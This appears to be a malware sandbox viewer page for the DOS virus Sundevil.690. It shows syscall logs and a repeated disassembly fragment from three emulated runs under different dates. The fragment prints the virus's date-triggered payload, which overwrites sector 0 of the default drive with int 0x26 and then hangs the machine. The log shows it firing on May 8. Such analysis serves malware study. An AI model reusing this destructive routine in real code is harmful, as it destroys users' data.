Sample viewer

vx.netlux.org/Virus.DOS.Sundevil.690

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:16.550479878Z 42 PC: 12a4d | Get date
0x12a4d: cmp dx, 0x508
0x12a51: je 0x12a55
0x12a53: jmp 0x12a71
0x12a55: mov ah, 0x19
0x12a57: int 0x21
0x12a59: xor bx, bx
0x12a5b: mov cx, 1
0x12a5e: xor dx, dx
0x12a60: int 0x26
0x12a62: popf
0x12a63: push cs
0x12a64: pop ds
0x12a65: lea dx, word ptr [bp + 0x9e]
0x12a69: mov ah, 9
0x12a6b: int 0x21
0x12a6d: int 5
0x12a6f: jmp 0x12a6d
0x12a71: call 0x12aca
0x12a74: sub ax, 0x1000
0x12a77: push ax
2018-12-17T22:58:16.553194213Z 53 PC: 12a9d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:58:16.55463535Z 37 PC: 12ac4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12820,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:35.611570939Z 42 PC: 12a4d | Get date
0x12a4d: cmp dx, 0x508
0x12a51: je 0x12a55
0x12a53: jmp 0x12a71
0x12a55: mov ah, 0x19
0x12a57: int 0x21
0x12a59: xor bx, bx
0x12a5b: mov cx, 1
0x12a5e: xor dx, dx
0x12a60: int 0x26
0x12a62: popf
0x12a63: push cs
0x12a64: pop ds
0x12a65: lea dx, word ptr [bp + 0x9e]
0x12a69: mov ah, 9
0x12a6b: int 0x21
0x12a6d: int 5
0x12a6f: jmp 0x12a6d
0x12a71: call 0x12aca
0x12a74: sub ax, 0x1000
0x12a77: push ax
2018-12-25T12:36:35.613635481Z 53 PC: 12a9d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:35.614704145Z 37 PC: 12ac4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":8,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12820,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:36.012277607Z 42 PC: 12a4d | Get date
0x12a4d: cmp dx, 0x508
0x12a51: je 0x12a55
0x12a53: jmp 0x12a71
0x12a55: mov ah, 0x19
0x12a57: int 0x21
0x12a59: xor bx, bx
0x12a5b: mov cx, 1
0x12a5e: xor dx, dx
0x12a60: int 0x26
0x12a62: popf
0x12a63: push cs
0x12a64: pop ds
0x12a65: lea dx, word ptr [bp + 0x9e]
0x12a69: mov ah, 9
0x12a6b: int 0x21
0x12a6d: int 5
0x12a6f: jmp 0x12a6d
0x12a71: call 0x12aca
0x12a74: sub ax, 0x1000
0x12a77: push ax
2018-12-25T12:36:36.017492648Z 25 PC: 12a59 | Get default drive
2018-12-25T12:36:36.639857193Z 9 PC: 12a6d | Display string (Could not find end pointer)